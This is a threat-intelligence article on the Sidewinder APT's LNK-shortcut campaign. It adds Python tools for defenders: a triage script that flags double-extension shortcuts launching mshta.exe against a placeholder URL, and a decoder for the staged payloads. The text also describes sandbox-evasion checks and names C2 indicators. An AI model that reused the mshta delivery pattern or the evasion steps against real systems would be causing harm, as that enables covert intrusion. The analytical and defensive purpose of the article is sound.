Sidewinder Hackers Exploit LNK Files to Deploy Malicious Scripts

In a striking evolution of its tactics, the Sidewinder advanced persistent threat (APT) group—also known as APT-C-24 or “Rattlesnake”—has adopted a novel delivery mechanism leveraging Windows shortcut (LNK) files to orchestrate complex, multi-stage intrusions across South Asia.

Active since at least 2012 and targeting governments, energy utilities, military installations, and mining operations in Pakistan, Afghanistan, Nepal, Bhutan, and Myanmar, Sidewinder’s latest campaign exemplifies the group’s continued innovation in stealthy espionage operations.

Security researchers at the 360 Advanced Threat Research Institute uncovered a series of compressed archives containing three malicious LNK files each.

These archives, hosted on remote servers, employ carefully crafted filenames—such as “file 1.docx.lnk,” “file 2.docx.lnk,” and “file 3.docx.lnk”—to masquerade as benign documents.

When a victim opens any of these shortcuts, the Windows mshta.exe binary is launched to fetch and execute an obfuscated JScript payload from a remote URL whose query string carries “yui=0,” “yui=1,” or “yui=2,” one value per shortcut.
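To make the delivery mechanism concrete, here is an added triage script (not code from the report or from 360) that parses the string fields of a .lnk file and flags the traits described above: a document extension sitting in front of .lnk, a script host such as mshta.exe as the target, and a remote URL carrying an incrementing numeric parameter. The reader follows the public MS-SHLLINK layout (header, LinkTargetIDList, LinkInfo, StringData). The sample shortcut is constructed inside the script; its host and path (example.invalid) are placeholders, not the campaign's infrastructure.

```python
"""Triage LNK files for the double-extension / mshta-to-remote-URL pattern (added example).

Minimal ShellLink (MS-SHLLINK) reader: header, LinkTargetIDList (skipped), LinkInfo
(local base path recovered), then the StringData fields where the arguments live.
"""
import re
import struct

# LinkCLSID 00021401-0000-0000-C000-000000000046 as it appears on disk (little-endian fields)
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HEADER_SIZE = 0x4C

# LinkFlags bits that matter here
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
IS_UNICODE = 0x80
STRING_FIELDS = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location"))

# Script hosts and other living-off-the-land binaries a "document" shortcut has no business launching
LOLBINS = ("mshta", "powershell", "cmd.exe", "wscript", "cscript", "rundll32", "regsvr32", "certutil")
DOCUMENT_EXTENSIONS = {"doc", "docx", "xls", "xlsx", "ppt", "pptx", "pdf", "txt", "jpg", "jpeg", "png"}
URL_RE = re.compile(r"https?://\S+", re.I)
NUMERIC_PARAM_RE = re.compile(r"[?&]([A-Za-z]+)=(\d+)")


def parse_lnk(data: bytes) -> dict:
    """Return the string fields of a .lnk file (plus the LinkInfo local base path, if present)."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE \
            or data[4:20] != LNK_CLSID:
        raise ValueError("not a ShellLink file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    fields = {}
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (2 bytes) followed by the IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize counts itself
        li_size, _li_hdr, li_flags = struct.unpack_from("<III", data, pos)
        if li_flags & 0x01:                      # VolumeIDAndLocalBasePath: ANSI, NUL-terminated
            off = struct.unpack_from("<I", data, pos + 16)[0]   # LocalBasePathOffset
            end = data.index(b"\x00", pos + off)
            fields["local_base_path"] = data[pos + off:end].decode("cp1252", errors="replace")
        pos += li_size
    unicode = bool(flags & IS_UNICODE)
    for bit, name in STRING_FIELDS:              # CountCharacters (2 bytes) + characters, no terminator
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            nbytes = count * 2 if unicode else count
            fields[name] = data[pos:pos + nbytes].decode("utf-16-le" if unicode else "cp1252",
                                                         errors="replace")
            pos += nbytes
    return fields


def triage_lnk(filename: str, data: bytes) -> list:
    """Return human-readable findings for one shortcut; an empty list means nothing matched."""
    fields = parse_lnk(data)
    findings = []
    lower_name = filename.lower()
    if lower_name.endswith(".lnk"):
        parts = lower_name[:-4].rsplit(".", 1)
        if len(parts) == 2 and parts[1] in DOCUMENT_EXTENSIONS:
            findings.append(f"double extension masquerading as .{parts[1]}")
    cmdline = " ".join(fields.get(k, "") for k in ("local_base_path", "relative_path", "arguments"))
    for tool in LOLBINS:
        if tool in cmdline.lower():
            findings.append(f"launches {tool}")
    url = URL_RE.search(cmdline)
    if url:
        findings.append(f"remote URL on the command line: {url.group(0)}")
        param = NUMERIC_PARAM_RE.search(url.group(0))
        if param:
            findings.append(f"incremental-style query parameter {param.group(1)}={param.group(2)}")
    return findings


def build_lnk(local_path: str, arguments: str) -> bytes:
    """Constructed fixture: a minimal ShellLink with LinkInfo (local base path) and an arguments string."""
    flags = HAS_LINK_INFO | 0x20 | IS_UNICODE
    header = struct.pack("<I16sI", HEADER_SIZE, LNK_CLSID, flags)
    header += bytes(HEADER_SIZE - len(header))   # remaining header fields left zero
    volume_id = struct.pack("<IIII", 17, 3, 0x12345678, 16) + b"\x00"   # DRIVE_FIXED, empty label
    path = local_path.encode("cp1252") + b"\x00"
    li_hdr = 28                                   # LinkInfoHeaderSize without the optional Unicode offsets
    li_size = li_hdr + len(volume_id) + len(path)
    link_info = struct.pack("<IIIIIII", li_size, li_hdr, 0x01,
                            li_hdr,                      # VolumeIDOffset
                            li_hdr + len(volume_id),     # LocalBasePathOffset
                            0,                           # CommonNetworkRelativeLinkOffset
                            li_size - 1)                 # CommonPathSuffixOffset (empty string)
    link_info += volume_id + path
    string_data = struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")
    return header + link_info + string_data


# Constructed sample modelled on the report: a document-looking name, mshta.exe as the target
# and a URL carrying one of the yui=N values. The host and path are placeholders.
SAMPLE_NAME = "file 2.docx.lnk"
SAMPLE_LNK = build_lnk(r"C:\Windows\System32\mshta.exe", "https://example.invalid/page?yui=1")

if __name__ == "__main__":
    for finding in triage_lnk(SAMPLE_NAME, SAMPLE_LNK):
        print(f"[!] {SAMPLE_NAME}: {finding}")
```

Point `triage_lnk` at each shortcut pulled from a suspicious archive; on the constructed sample it reports the double extension, the mshta launch, the remote URL and the yui=1 parameter, while a shortcut to a plain local file yields no findings. The reader deliberately ignores the IDList and any ExtraData blocks, which is enough for triage but not for full forensic parsing.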

This approach abandons the group’s long-favored reliance on legacy Microsoft Office exploits (CVE-2017-0199 and CVE-2017-11882) in favor of a more flexible, script-based execution path in which the operative stages are decoded only in memory.

Upon execution, the JScript works through several layers of obfuscation to unpack a disguised secondary payload. It writes Base64-encoded data straight to the victim’s TEMP directory under the deceptive filename “file 2.docx.”

Unlike a typical dropper, the script does not decode that file locally; it leaves decompression and deobfuscation to a subsequent .NET component, also delivered through mshta.exe, which does the work in memory. Because the decoded content never touches disk, this two-step procedure hinders antivirus engines that rely on scanning on-disk artifacts.

Profiling and Payload Deployment

The component that emerges is itself a heavily obfuscated C# downloader (MD5: 2e382c82d055e6e3a5feb9095d759735), which begins with an environment reconnaissance routine.

It queries the number of CPU cores via WMI and exits early if fewer than two are present, a crude filter against single-core sandboxes and analysis VMs.

It similarly verifies that physical memory exceeds 810 MB before proceeding, thereby avoiding resource-constrained environments typically associated with virtual machines used in sandbox analysis.

If environmental checks pass, the downloader inspects running processes for strings associated with security products—such as “Kaspersky” or “ESET NOD32 Antivirus.”

Detected names are appended as query parameters to the C2 URL, ostensibly to inform the attacker of the target’s security posture.

Following this, the downloader locates the dropped “file 2.docx,” performs Base64 decoding and decompression, and launches the decoy document to distract the user.

Finally, it retrieves a further payload from the C2 infrastructure, decrypts it with an XOR routine keyed by the first 32 bytes of the response, and reflectively loads the result into memory to give the operators remote control of the host.
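As an added example, not the group’s code or anything reproduced from the analysis, the following script reverses the two decoding steps described above so an analyst can recover the decoy and the final stage from captured artifacts: the Base64-encoded, compressed drop and the XOR-wrapped C2 response. Two details the report leaves unstated are assumptions here: the compression format (gzip, zlib and raw deflate are tried in turn) and the key schedule (the 32-byte key is applied cyclically over the remainder). The fixtures at the bottom are constructed, with a placeholder MZ-prefixed blob standing in for the real final stage.

```python
"""Recover the staged payloads the report describes from captured artifacts (added example)."""
import base64
import gzip
import zlib
from itertools import cycle

KEY_LEN = 32   # per the report, the XOR key is the first 32 bytes of the C2 response


def decode_dropped_file(blob: bytes) -> bytes:
    """Base64-decode the TEMP-directory drop ("file 2.docx") and inflate it.

    The report does not name the compression scheme; gzip, zlib and raw deflate are tried
    in turn, which covers what .NET's GZipStream/DeflateStream produce (assumption).
    """
    raw = base64.b64decode(blob)
    for inflate in (gzip.decompress, zlib.decompress, lambda b: zlib.decompress(b, -zlib.MAX_WBITS)):
        try:
            return inflate(raw)
        except (OSError, EOFError, zlib.error):
            continue
    raise ValueError("unrecognised compression format")


def _xor_cycle(body: bytes, key: bytes) -> bytes:
    return bytes(b ^ k for b, k in zip(body, cycle(key)))


def xor_unwrap(response: bytes) -> bytes:
    """Split a C2 response into its 32-byte key and body, and XOR the body with the key.

    The cyclic key schedule is an assumption; the report states only the key's length
    and position, not how it is applied.
    """
    if len(response) <= KEY_LEN:
        raise ValueError("response too short to hold a key and a payload")
    return _xor_cycle(response[KEY_LEN:], response[:KEY_LEN])


def looks_like_pe(payload: bytes) -> bool:
    """Cheap sanity check before calling a decode successful: the final stage is loaded
    reflectively, so an MZ header is expected."""
    return payload[:2] == b"MZ"


# --- constructed fixtures: what the staging would look like on disk and on the wire ---
SAMPLE_DECOY = b"PK\x03\x04" + b"decoy document bytes " * 20          # a DOCX is a ZIP, hence PK
SAMPLE_DROP = base64.b64encode(gzip.compress(SAMPLE_DECOY))          # as written to %TEMP%\file 2.docx
SAMPLE_KEY = bytes(range(KEY_LEN))
SAMPLE_PAYLOAD = b"MZ" + b"\x90" * 62 + b"fake final stage"          # placeholder, not a real PE
SAMPLE_RESPONSE = SAMPLE_KEY + _xor_cycle(SAMPLE_PAYLOAD, SAMPLE_KEY)  # key || encrypted body

if __name__ == "__main__":
    decoy = decode_dropped_file(SAMPLE_DROP)
    stage = xor_unwrap(SAMPLE_RESPONSE)
    print(f"decoy: {len(decoy)} bytes, starts with {decoy[:2]!r}")
    print(f"final stage: {len(stage)} bytes, PE header present: {looks_like_pe(stage)}")
```

In practice you would feed `decode_dropped_file` the bytes of the dropped “file 2.docx” and `xor_unwrap` the body of the C2 HTTP response captured from a proxy or sandbox; if `looks_like_pe` comes back false on a real sample, the key schedule assumption is the first thing to revisit.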

Confirming Attribution to Rattlesnake

The architecture of this attack mirrors Sidewinder’s previous campaigns, sharing hallmarks such as double-extension LNK filenames and remote URLs suffixed with incrementing numeric parameters.

Earlier archives employed “.jpg.lnk” extensions with “q=0,1,2” parameters, whereas the current wave uses “.docx.lnk” and “yui=0,1,2.” All C2 domains—including policy.mail163cn.info—resolve to IP 89.150.45.75 and exhibit consistent JARM fingerprints and HTTP headers (“HTTP/1.1 404 Not Found,” nginx), aligning with Rattlesnake’s infrastructure patterns.

Moreover, the inclusion of geographic indicators such as “nepal,” “army,” and “lk” in domain names echoes Sidewinder’s historical preference for region-specific subdomains.

The congruence of obfuscation algorithms, file naming conventions, and C2 hosting techniques leaves little doubt that the “yui” LNK campaign is the work of the APT-C-24 group.

As Sidewinder continues to refine its tradecraft, organizations operating in South Asia and beyond must remain vigilant against seemingly innocuous shortcuts.

Blocking LNK files delivered inside archives and email, constraining mshta.exe through application control (AppLocker or WDAC) where feasible, and alerting on mshta.exe launched with an http or https URL on its command line will be critical to detecting and mitigating this threat.


About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.